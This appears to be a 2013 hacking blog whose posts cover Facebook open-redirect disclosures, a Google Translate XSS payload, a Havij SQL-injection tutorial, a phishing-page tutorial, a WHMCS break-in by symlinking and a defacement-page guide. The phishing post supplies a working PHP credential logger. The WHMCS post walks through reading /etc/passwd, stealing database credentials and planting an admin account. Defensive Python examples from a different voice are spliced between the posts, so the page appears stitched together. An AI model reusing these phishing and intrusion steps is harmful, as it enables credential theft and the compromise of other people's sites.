Tuesday, December 10, 2013

Facebook Open URL Redirection Vulnerability [Bug Bounty Program]

Hi everyone, it's been a long time since my last post as I was busy these days. Today I'm going to disclose a bug I found on Facebook. I have been rewarded $1000 for this bug and will soon be on the Facebook Whitehat list.

Description
An open redirect occurs when an application takes a URL parameter and redirects the user to its value without validating it. This vulnerability is used in phishing attacks: the link shows a trusted domain, but the victim ends up on a malicious site without realizing it.
Consequences
Phishing

Platform
All web platforms are affected (source: OWASP).

Description:
[#] Title    :   Facebook Open URL Redirection Vulnerability
[#] Status   :   Fixed
[#] Severity :   Medium
[#] Works on :   Any browser with any version
[#] Reward   :   $1000

I have found 6 open URL redirectors in 6 different Facebook dialogs. This vulnerability is exploitable against all users who are signed into Facebook. This bug is very similar to the one Arul Kumar V. found recently, as I also had to bypass the user interaction. To bypass the user interaction I used the Mozilla add-on Live HTTP Headers and got the necessary parameters. I used these parameters:
from_post=1, _path=send, error_ok=Okay
You can watch the POC video here: https://vimeo.com/80538675

Impact of Vulnerability:
1. The user may be redirected to an untrusted page that contains malware which may then compromise the user's machine.
2. The user may be subjected to phishing attacks by being redirected to an untrusted page.
3. This bug applies to any signed-in user, in any browser and any version.

About Facebook Dialog:
Dialogs provide a simple, consistent interface to provide social functionality to people using your apps. Dialogs do not require any additional permissions because they require someone to directly interact with them. Dialogs can be used by your application in several contexts: in a website or mobile web app, within native iOS and native Android applications, or in a game on Facebook.com.

Reference: https://developers.facebook.com/docs/dialogs/ 


Reproduction Instructions / Proof of Concept:
If any signed-in Facebook user clicks any one of the following links, they will be redirected to the page of our choice. URL shorteners can be used to mask malicious links. I got redirects on six different dialogs.
Note: You must be signed into a Facebook account for the redirect to work.

Vulnerable URLs:
https://m.facebook.com/dialog/send?next=http://google.com&app_id=104018109673165&from_post=1&_path=send&error_ok=Okay
https://m.facebook.com/dialog/pagetab?next=http://google.com&app_id=104018109673165&from_post=1&_path=send&error_ok=Okay
https://m.facebook.com/dialog/feed?next=http://google.com&app_id=104018109673165&from_post=1&_path=send&error_ok=Okay
https://m.facebook.com/dialog/share?next=http://google.com&app_id=104018109673165&from_post=1&_path=send&error_ok=Okay
https://m.facebook.com/dialog/pay?next=http://google.com&app_id=104018109673165&from_post=1&_path=send&error_ok=Okay 
https://m.facebook.com/dialog/login?next=http://google.com&app_id=104018109673165&from_post=1&_path=send&error_ok=Okay

After I reported the bug I got this reply, and they fixed the bug within a week.


Thursday, November 14, 2013

XSS Vulnerability in translate.googleusercontent.com

Hi everyone. Today I came across an XSS vulnerability in translate.googleusercontent.com. But according to the Program Rules of Google Application Security, bugs like XSS in sandbox domains do not qualify for a bounty and are not considered bugs.
To reproduce this XSS, go to the "translate a document" page in Google Translate. Then create a .txt document containing the following line and submit it for translation.
Script to write in the .txt file:
<script>alert("hacked")</script>


After you have created your .txt file, upload it to the page and hit Translate. Make sure you translate it into a language other than English, or else it will not work. You then get XSS in translate.googleusercontent.com.
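The bug above is a classic case of untrusted document content being written into an HTML page without output encoding. The following is an added illustration of the defensive side (it is not Google's code, and the page does not describe how the issue was fixed): a renderer that HTML-escapes every line of a translated document before embedding it, sends a restrictive Content-Security-Policy as a second layer, and a small naive checker (an assumption of this example, not a real sanitizer) used only to confirm that the rendered output contains no active markup.

```python
import html
import re

# Defence in depth: even if an encoding bug slips through, inline scripts
# and external script sources are blocked by this policy.
CSP = "default-src 'none'; style-src 'self'; img-src 'self'; base-uri 'none'; form-action 'self'"


def render_translated_text(translated, page_title="Translated document"):
    """Return (headers, body) for displaying untrusted translated text.

    Every line goes through html.escape(), so a <script> tag inside the
    uploaded document is displayed as text rather than executed.
    """
    safe_title = html.escape(page_title, quote=True)
    paragraphs = [
        "<p>%s</p>" % html.escape(line, quote=True)
        for line in (translated.splitlines() or [""])
    ]
    body = (
        "<!DOCTYPE html>\n"
        '<html><head><meta charset="utf-8"><title>%s</title></head>\n'
        "<body>\n%s\n</body></html>\n" % (safe_title, "\n".join(paragraphs))
    )
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": CSP,
        "X-Content-Type-Options": "nosniff",
    }
    return headers, body


# Naive pattern for the markup that typically carries an XSS payload.
# This is a test aid for the example, not a sanitizer: escaping is the fix.
_ACTIVE_MARKUP = re.compile(
    r"<\s*(script|iframe|object|embed)\b|\bon[a-z]+\s*=|javascript:", re.I
)


def contains_active_markup(fragment):
    """True if the fragment still contains raw script-bearing markup."""
    return bool(_ACTIVE_MARKUP.search(fragment))


if __name__ == "__main__":
    # Constructed sample: the same one-line document the post uses.
    uploaded = '<script>alert("hacked")</script>'
    hdrs, page = render_translated_text(uploaded)
    print(page)
    print("raw payload active:", contains_active_markup(uploaded))
    print("rendered page active:", contains_active_markup(page))
```

The rendered page shows the literal text `<script>alert("hacked")</script>` to the user, and the CSP would block inline script execution even if a future template forgot to escape.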

Sunday, November 10, 2013

SQL injecting using "Havij - Advanced SQL Injection Tool" [TUT]



Hello guys, today I'm going to show you how to exploit SQL-injectable sites using Havij (Advanced Automatic SQL Injection Tool).
So let's start the tutorial on hacking a website using Havij.

By SQL injecting you extract the website's database. First you should know what a database is.

A website database is a collection of information such as images, login IDs, passwords, company data, etc., all stored on a database server so that it can be easily accessed, managed and updated. Databases can be classified according to the type of content: bibliographic, full-text, numeric, images, etc.

What is Havij ?
Havij Pro is an advanced SQLi exploitation tool that can exploit SQL injection vulnerabilities in a website and gain access to its database. Havij is an automatic, advanced SQLi tool.

So let's start.
Using Havij is easy; there aren't any complicated steps to follow, unlike manual injection.
But you won't know what Havij is actually doing if you haven't learned manual SQL injection.

Things you will need :

Havij Pro (Google it or comment if you can't find it)
A website vulnerable to SQL injection (you can use Google dorks to find one)
And probably a BRAIN. :P
NOTE: If you want to find SQL injection in a particular website of your choice, you can use Acunetix or the OWASP vulnerability scanner.
   
The real deal comes here. [EASY]

After you have found a SQL injection vulnerability in a website, enter the website URL into the Target box and click Analyze.
After analyzing, you can see that it finds the database name, tables and other things.
Always keep an eye on the STATUS box [Log].

Now we have the database name and tables. Let's find the columns and the data: emails, users, passwords, etc.
After getting the database name, you can see that the "Tables" button is activated and we can read the tables.
Just click on "Tables" and you will get the tables.
Here we have succeeded in finding the database tables; now it's time to find the database rows and columns,
so click on Get DBs.
Get DBs loads all databases into the program so they can be easily accessed. Now click on Get Tables again.

Finally we get the 'users' table. Now select users and click on 'Get Columns'.

After getting the columns, click on 'Get Data' and you will get all the login IDs and passwords.

So here we have the website admin ID and password. Now you have to crack the password if it is hashed. [In most websites passwords are hashed.]
Now it's time to log into the website using this admin login ID and password.
To get the admin page, click on 'Find Admin' and click Start to search for the admin page.
Now go to that admin URL and log in with the ID and password you got from the database. You have now successfully hacked into the website.
You just need to upload a shell and do much more exciting things.
If you don't have a vulnerable website, just set up a penetration testing lab on your computer, like OWASP BWA, DVWA, etc.
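What Havij automates only works because the application splices user input straight into a SQL string. The block below is an added example (not part of the tutorial, and not Havij's code) that puts the vulnerable lookup next to the hardened one, using an in-memory SQLite database with constructed sample users. It also shows why "most websites hash passwords" matters: the hardened login stores PBKDF2 hashes with a per-user salt and compares them in constant time, so a dumped table is far less useful than the plaintext credentials the tutorial expects to find. Table, column and user names are assumptions of this example.

```python
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ROUNDS = 200_000  # assumption: tune for your hardware


def hash_password(password, salt):
    """Salted PBKDF2-HMAC-SHA256; a per-user salt defeats precomputed tables."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


def build_db():
    """Constructed sample database with two users and hashed passwords."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_salt BLOB, pw_hash BLOB)"
    )
    for name, password in [("admin", "correct horse"), ("alice", "hunter2")]:
        salt = os.urandom(16)
        conn.execute(
            "INSERT INTO users (username, pw_salt, pw_hash) VALUES (?, ?, ?)",
            (name, salt, hash_password(password, salt)),
        )
    conn.commit()
    return conn


def find_user_vulnerable(conn, username):
    """The pattern Havij exploits: input is concatenated into the query text."""
    sql = "SELECT id, username FROM users WHERE username = '%s'" % username
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username):
    """Hardened form: the driver binds the value, so it can never become SQL."""
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ?", (username,)
    ).fetchall()


def login_safe(conn, username, password):
    """Parameterised lookup plus constant-time hash comparison."""
    row = conn.execute(
        "SELECT pw_salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    salt, stored_hash = row
    return hmac.compare_digest(hash_password(password, salt), stored_hash)


def demo():
    """Run the same injection payloads against both lookups."""
    conn = build_db()
    tautology = "' OR '1'='1"   # turns the WHERE clause into "always true"
    comment = "admin'--"        # terminates the literal and comments out the rest
    return {
        "vulnerable_tautology_rows": len(find_user_vulnerable(conn, tautology)),
        "safe_tautology_rows": len(find_user_safe(conn, tautology)),
        "vulnerable_comment_rows": len(find_user_vulnerable(conn, comment)),
        "safe_comment_rows": len(find_user_safe(conn, comment)),
        "admin_login_ok": login_safe(conn, "admin", "correct horse"),
        "admin_login_wrong": login_safe(conn, "admin", "wrong"),
        "unknown_user": login_safe(conn, "mallory", "anything"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-28s %s" % (key, value))
```

Against the concatenated query the tautology payload returns every user and `admin'--` returns the admin row; against the bound parameter both return nothing, because SQLite treats the whole string as a username literal.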

NOTE: This article is for educational purposes only. I am not responsible for any misuse of this article. Remember that hacking is illegal in most of the countries. You can create a Pentesting lab and test your skills there.

Saturday, November 9, 2013

Phishing Page [TUT] - Noob Freindly



Phishing has become a very easy trick for stealing users' usernames and passwords.
Today I will show you how to create a phishing page for almost any site that uses a login form (for example Facebook, Gmail, Yahoo, etc.).
To make a phishing page and use this method you need a hosting site (Google it for free web hosting sites) or your own website.
Register yourself at a free hosting site.

Note: This article is for only educational purposes. Please do not attempt this method on real users. I am not responsible for any damage caused by this.


Now that you have a hosting account, let's start creating the phishing page.
Step one.
First go to the target site. In your browser select Save As from the File menu and save the site on your computer with the name "login.html".

Alternatively, right-click on the page, click "View Source", copy all of it and save it to a Notepad file.
Rename the file to "login.html".

Now step two.
Open up Notepad and copy this into it:

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value)
 {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Replace facebook.com with the URL you want the user to be redirected to after they click the login button.
Save the file as Phish.php.

Now you need to edit the "login.html" file we saved earlier. Navigate to it and open it with Notepad.
Search for an HTML attribute like "action=" that belongs to the login form, and replace its URL with "Phish.php".

Also create a blank text file named "log.txt". This file will be used to save the victims' logins and passwords.
Now you are done making the phishing page.

Go to your hosting account and upload all three files to your server.
Now go to the URL provided by your host.

Like - http://faceboook-1.hostingsite.com/login.htm

You will see the phishing page looking just like the real site.
To test it, type anything in the login and password fields and hit the login button.

Check the log.txt file. The username and password you just entered will be saved in log.txt.
WOW, you now have your own phishing page.

Note: If you have any doubts, or don't know where to create a hosting account, feel free to comment. I will try to reply to you as soon as possible.
ONCE AGAIN NOTE: This article is for only educational purposes. Please do not attempt this method on real users. I am not responsible for any damage caused by this.

Sunday, October 20, 2013

Hacking WHMCS [TUT] 2013

Hi guys. Today I will be showing how to hack a WHMCS via symlinking, so let's get started.
Things you will need:
1) Shelled website
2) Tool I will post at the end of the tutorial
3) PuTTY
4) Symlink script
5) MySQL manager
What is WHMCS?
Code:
“WHMCS is an all-in-one client management, billing & support solution for online businesses. Handling everything from signup to termination, WHMCS is a powerful business automation tool that puts you firmly in control”
DEMO: http://demo.whmcs.com/
ADMIN AREA DEMO: http://demo.whmcs.com/admin/login.php
How do I find out if my server has WHMCS?
That is easy.
Check your kernel string. Usually it will look like:

Code:
Linux ns1.hosting.com x.x.xx-xxx.xx.x.xxx #1 SMP xxx xxx x xx:xx:xx EST 2012 x86_64

If your kernel string contains a hostname like "ns1.hosting.com", that means WHMCS is installed on that site.

So go to hosting.com and you will probably find it.
Or you can Google-dork it:

Code:
site:hosting.com inurl:/admin/login.php "WHMCS"

Exploiting
First off we need to find our hosting's path.
So do:

Code:
cat /etc/passwd
or just view the /etc/passwd file to find all the users on the hosting.
Once you have done that, save it to a .txt file somewhere.
In my example I got lucky and found the path easily. (There was WordPress installed, so I viewed wp-content/plugins/akismet/legacy.php, which gave me the full path.)
But usually you can find it from the URL.
Now I know my site's path:
Code:
/home/user/public_html/
And the WHMCS path is /hosting/, so my target file is configuration.php, located in:
Code:
/home/user/public_html/hosting/configuration.php
Okay, now make a new folder in your shell.
We will now try to access the file mentioned above.
The next thing I want to do is enter the folder and upload the script.
In the box, enter the path and the file you want:
Code:
/home/user/public_html/hosting/configuration.php
Press Go and you will get something like this:
Press Symlink and it will open a new page.
Notice how the page is blank. That means it worked.
Right-click -> View Source, and our target's database credentials will be there.
Getting access to the WHMCS
Now that you have the configuration info from the site, you need to connect to the MySQL database and create a new administrator.

Open the mysql.php script (provided at the end of the tutorial) and enter the credentials (username and password).
When you are logged in to the main database, click "Tables".
NOTE: You can press "Dump" to save all the info in the database!
You now have a list. Good.
Find tbladmins and click "Data".
From there you can edit/add admin users.
As you can see, I added a new user so I can access it later.
Now I log in with the new user I created.
Now I have a tool for these cases.
There you can manage cPanels, dump them, view CC info and the rest of the BH shit. :)
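The technique above depends on one tenant of a shared host being able to create a symlink that resolves into another tenant's home directory and have the web server serve it. The block below is an added example from the defender's side (it is not the tutorial's script and not part of WHMCS): an audit that walks a tenant's web root without following links, resolves every symlink, and reports those whose real target lies outside the directory the tenant is allowed to serve. The directory layout, user names and file contents are constructed in a temporary directory so the example runs offline.

```python
import os
import tempfile


def find_escaping_symlinks(scan_dir, allowed_root):
    """Return (link_path, raw_target, resolved_target) for every symlink under
    scan_dir whose resolved target is outside allowed_root."""
    allowed = os.path.realpath(allowed_root)
    findings = []
    # followlinks=False: never descend through a link, the link itself is the finding
    for dirpath, dirnames, filenames in os.walk(scan_dir, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            resolved = os.path.realpath(path)   # resolves chains of links too
            try:
                inside = os.path.commonpath([allowed, resolved]) == allowed
            except ValueError:                   # different drives on Windows
                inside = False
            if not inside:
                findings.append((path, os.readlink(path), resolved))
    return findings


def build_demo_tree():
    """Constructed sample: two tenants, one of whom links to the other's config."""
    root = tempfile.mkdtemp(prefix="symlink-audit-")
    tenant = os.path.join(root, "home", "user", "public_html")
    victim_app = os.path.join(root, "home", "victim", "public_html", "hosting")
    os.makedirs(tenant)
    os.makedirs(victim_app)
    with open(os.path.join(victim_app, "configuration.php"), "w") as f:
        f.write("<?php // constructed sample, no real credentials ?>\n")
    with open(os.path.join(tenant, "index.html"), "w") as f:
        f.write("<h1>tenant site</h1>\n")
    # Hostile link: points at another tenant's configuration file.
    os.symlink(os.path.join(victim_app, "configuration.php"),
               os.path.join(tenant, "config_link"))
    # Benign link: stays inside the tenant's own web root.
    os.symlink("index.html", os.path.join(tenant, "home.html"))
    return root, tenant


if __name__ == "__main__":
    _root, tenant_dir = build_demo_tree()
    for link, raw, resolved in find_escaping_symlinks(tenant_dir, tenant_dir):
        print("escaping symlink: %s -> %s (resolves to %s)" % (link, raw, resolved))
```

In production this would run per tenant with `allowed_root` set to that tenant's home; together with the web server's "only follow symlinks owned by the same user" option and separate database credentials per application, it removes the cross-tenant read the tutorial relies on.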

Saturday, October 19, 2013

Facebook Open URL Redirection 2013



Hi, everyone. Today I'm going to disclose my Facebook bug to the public. I found this bug on 11 September 2013, but I was disappointed to hear from Facebook Security ("Emrakul") that a previous reporter had reported the bug before me. :( But they have fixed the vulnerability, so I'm going to disclose it.
Description:
Title    : Open URL Redirection
Status   : Fixed
Severity : Low
Works on : Any browser with any version

I found the redirection on "/dialog/feed/" after "www.facebook.com".
Impact:
1. The user may be redirected to an untrusted page that contains malware which may then compromise the user's machine.

2. The user may be subjected to phishing attacks by being redirected to an untrusted page.

3. This bug applies to any user who is signed into Facebook.
Reproduction:
If any signed-in Facebook user clicks any one of the following links, they will be redirected to the page of our choice. URL shorteners can be used to mask malicious links.
Note: You must be signed into a Facebook account for the redirect to work.
 
VULNERABLE URLs

https://www.facebook.com/dialog/feed/fb_dtsg=AQCRqLbh&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&error_ok=Okay&_path=feed%2F&redirect_uri=http%3A%2F%2Fgoogle.com&display=touch&from_post=1

https://m.facebook.com/dialog/feed/fb_dtsg=AQCRqLbh&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&error_ok=Okay&_path=feed%2F&redirect_uri=http://google.com&display=touch&from_post=1

https://touch.facebook.com/dialog/feed/fb_dtsg=AQCRqLbh&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&error_ok=Okay&_path=feed%2F&redirect_uri=http://google.com&display=touch&from_post=1

https://beta.facebook.com/dialog/feed/fb_dtsg=AQCRqLbh&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&error_ok=Okay&_path=feed%2F&redirect_uri=http://google.com&display=touch&from_post=1

Even after deleting "AQCRqLbh" after "fb_dtsg=" and "%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84" after "charset_test=", we can still redirect to the desired website.

You just have to change http://google.com to your desired malicious link.
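Both Facebook posts on this page come down to the same defect: a dialog accepts a full URL in a parameter (`next` in the December post, `redirect_uri` here) and sends the browser there without checking the destination. The block below is an added example of the standard mitigation and is not Facebook's code: it accepts only site-relative paths or absolute http(s) URLs whose host is on an allowlist, and falls back to a fixed landing page for everything else. It deliberately handles the bypasses an allowlist check usually gets wrong (protocol-relative `//host`, userinfo `trusted@evil`, backslashes, `scheme:host` without slashes, non-http schemes). The allowed hosts and landing page are assumptions of the example.

```python
from urllib.parse import urljoin, urlsplit

# Assumption: the only hosts this application may redirect to.
ALLOWED_HOSTS = {"www.example.com", "m.example.com"}
DEFAULT_LANDING = "https://www.example.com/"


def safe_redirect_target(next_param, allowed_hosts=ALLOWED_HOSTS, fallback=DEFAULT_LANDING):
    """Return a redirect destination that is guaranteed to stay on our hosts."""
    if not next_param:
        return fallback
    candidate = next_param.strip()

    # Browsers normalise '\' to '/' and ignore some control characters,
    # so "/\evil.com" becomes "//evil.com" client-side. Treat them as hostile.
    if any(ch in candidate for ch in "\\\r\n\t"):
        return fallback

    try:
        parts = urlsplit(candidate)
        host = parts.hostname            # lower-cased, port stripped
    except ValueError:                   # e.g. malformed IPv6 literal
        return fallback

    if parts.scheme:
        # Absolute URL: only http(s), no userinfo ("trusted.host@evil.com"),
        # and a host that is literally on the allowlist (no suffix matching).
        if parts.scheme.lower() not in ("http", "https"):
            return fallback
        if parts.username is not None or not host:
            return fallback              # also rejects "https:evil.com"
        return candidate if host in allowed_hosts else fallback

    if parts.netloc:
        # No scheme but a netloc: protocol-relative "//evil.com/..." form.
        return fallback

    if candidate.startswith("/"):
        # Site-relative path: anchor it to our own origin ("/x", but not "//x",
        # which was caught above because urlsplit reports a netloc for it).
        return urljoin(fallback, candidate)

    return fallback                      # "dialog/feed" style relative paths are not accepted


def classify_samples():
    """Run a set of constructed inputs through the check (for the reader)."""
    samples = [
        "https://www.example.com/profile",
        "/dialog/feed?x=1",
        "http://google.com",
        "//google.com/",
        "https://www.example.com@google.com/",
        "https://www.example.com.evil.example/",
        "https:google.com",
        "javascript:alert(1)",
        "/\\google.com",
        "",
    ]
    return {s: safe_redirect_target(s) for s in samples}


if __name__ == "__main__":
    for raw, resolved in classify_samples().items():
        print("%-44r -> %s" % (raw, resolved))
```

The check compares the parsed host against an exact set rather than testing whether the string contains "example.com", which is why the `www.example.com.evil.example` and `www.example.com@google.com` cases resolve to the fallback.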

This is the original message I received from Facebook Security.

Hi,
 
We're already aware of this issue because a previous reporter sent this in to us. 
We're working to fix it but we won't be able to reward you. We appreciate you taking the time 
to find and send this our way.
 
Thanks,
 
Emrakul
Security
Facebook
 
-----Original Message to Facebook-----
From: xxxxx@hotmail.com
To: 
Subject: Site redirection vulnerability
 
Name: xxxxxxxxxxxx
E-Mail: xxxxxx@hotmail.com
Type: open_redirect
Scope: www

Tuesday, July 30, 2013

How To Make A Cool Deface Page


Hello everyone, today I'm going to show you how to make a cool deface page. It is very simple to make one. Before we start I will tell you what exactly a deface page is. A deface page is an HTML page that you upload after hacking into a website. It is only there to show that you have breached their security. Now that you know what a deface page is, let's start with our page.
To create a deface page you must know HTML, or you can use Google to find HTML tags. You can learn HTML and many other languages at Codecademy.

STEP ONE
Open up your notepad. Go to Start>All Programs>Accessories>Notepad.

STEP TWO
So we are going to make a template; for almost all pages it is the same.
Put this in your Notepad:

<!DOCTYPE html>
<title>Page title here</title>
<html>
<body>

</body>
</html>

If you don't know the basics of HTML, you can visit Codecademy and learn some basic stuff. The <html></html> tag tells the browser to treat the document as a web page, so it has to be in the document; otherwise it won't be able to show the contents.
The <body></body> tag is the place where you put the content of the page.

OK, that's enough basics, so I'm moving forward. First we need to set a background colour and a heading for the page, so you have to put in some code like I have. Put "<body bgcolor="black">" to change the background colour. To make a heading put in this code:
"<h1 style="font-size: 60px; color: white; font-family: Agency FB">MvStats10 W4S H3r3</h1>"
Now it looks like this. You can see how the page looks by saving it with the file type set to All Files and a *.html name.

<!DOCTYPE html>
<embed src="https://www.youtube.com/v/YHWRLtybykc&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
<title>Page title here</title>
<html>
<center>
<body bgcolor="black">
<h1 style="font-size: 60px; color: white; font-family: Agency FB">MvStats10 W4S H3r3</h1>
</body>

</html>

If you want to put a song in your deface page, go to YouTube and play the song. At the end of the URL, after "http://www.youtube.com/watch?v=", there will be a code, something like "YHWRLtybykc". Copy that code and paste it into this tag:

 " <embed src="https://www.youtube.com/v/paste the code here&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed> "

Then add it after "<!DOCTYPE html>", like this:

<!DOCTYPE html>
<embed src="https://www.youtube.com/v/YHWRLtybykc&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
<title>Page title here</title>
<html>
<body>

</body>
</html>

Now I will show you how to put images on your deface page: <img src="http://s17.postimg.org/z28c3ghnj/images.jpg"/>
Your template will now look like this:

<!DOCTYPE html>

<embed src="https://www.youtube.com/v/YHWRLtybykc&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
<title>Page title here</title>
<html>
<center>
<body bgcolor="black">
<h1 style="font-size: 60px; color: white; font-family:Agency FB">MvStats10 Was Here</h1>
<br>
<img src="http://s17.postimg.org/z28c3ghnj/images.jpg"/>
</body>
</html> 


Now you have to write your message. After the image tag, open a <p></p> tag so you can write your message. Write your message like this inside the <p></p> tag:
"<p style="color: white; font-family: Courier; font-size: 20px">hello admin!<br>Mvstats10 has breached your security.
<br>Please do not blame us for this.
<br>Your Low Security Made Us Do This
<br>Bye</p>"


Now we are finished making the deface page. Your template should look something like this:


<!DOCTYPE html>

<embed src="https://www.youtube.com/v/YHWRLtybykc&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
<title>Page title here</title>
<html>
<center>
<body bgcolor="black">
<h1 style="font-size: 60px; color: white; font-family:Agency FB">MvStats10 Was Here</h1>
<br>
<img src="http://s17.postimg.org/z28c3ghnj/images.jpg"/>
<p style="color: white; font-family: Courier; font-size: 20px">hello admin!<br>Mvstats10 has breached your security.
<br>Please do not blame us for this.
<br>Your Low Security Made Us Do This
<br>Bye</p>
</body>
</html>


Now save your page in HTML format, e.g. defacepage.html, or else it won't work. Remember to change the file type to All Files in Notepad when saving.
You can also make the text write itself out, which uses JavaScript and is a bit more complicated. My deface page's text is self-writing. It's quite cool; you can edit my deface page.
You can find my deface page here.

Now we have finished making our deface page. I hope this article helped you a lot.
Feel free to comment with your ideas or any doubts about this.
Enjoy making your deface page.
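From the site owner's side, a deface page is simply an unexpected write to the web root, and the fastest way to notice one is a file-integrity baseline. The block below is an added example (not from this post): it hashes every regular file under a web root, then diffs a later snapshot against the baseline to report added, removed and modified files. The web root, its files and the simulated defacement are constructed in a temporary directory so the example runs offline.

```python
import hashlib
import os
import tempfile


def snapshot(web_root):
    """Map relative path -> SHA-256 hex digest for every regular file under web_root."""
    baseline = {}
    for dirpath, _dirnames, filenames in os.walk(web_root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue                         # symlinks/devices are not content
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            baseline[os.path.relpath(full, web_root)] = digest.hexdigest()
    return baseline


def diff_snapshots(before, after):
    """Report what changed between two snapshots of the same web root."""
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": sorted(p for p in before.keys() & after.keys() if before[p] != after[p]),
    }


def demo_defacement():
    """Constructed sample: take a baseline, overwrite index.html, drop a new page."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "css"))
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<h1>Welcome</h1>\n")
    with open(os.path.join(root, "css", "site.css"), "w") as fh:
        fh.write("body { margin: 0 }\n")
    before = snapshot(root)

    # Simulated defacement: the landing page is replaced and a new file appears.
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<h1>replaced</h1>\n")
    with open(os.path.join(root, "defacepage.html"), "w") as fh:
        fh.write("<h1>constructed sample</h1>\n")
    return diff_snapshots(before, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo_defacement().items():
        print("%-9s %s" % (kind + ":", ", ".join(paths) or "-"))
```

Stored off-host (so an intruder with write access to the web root cannot also rewrite the baseline) and run on a schedule, the same two functions give an alert within one interval of any defacement or web-shell upload.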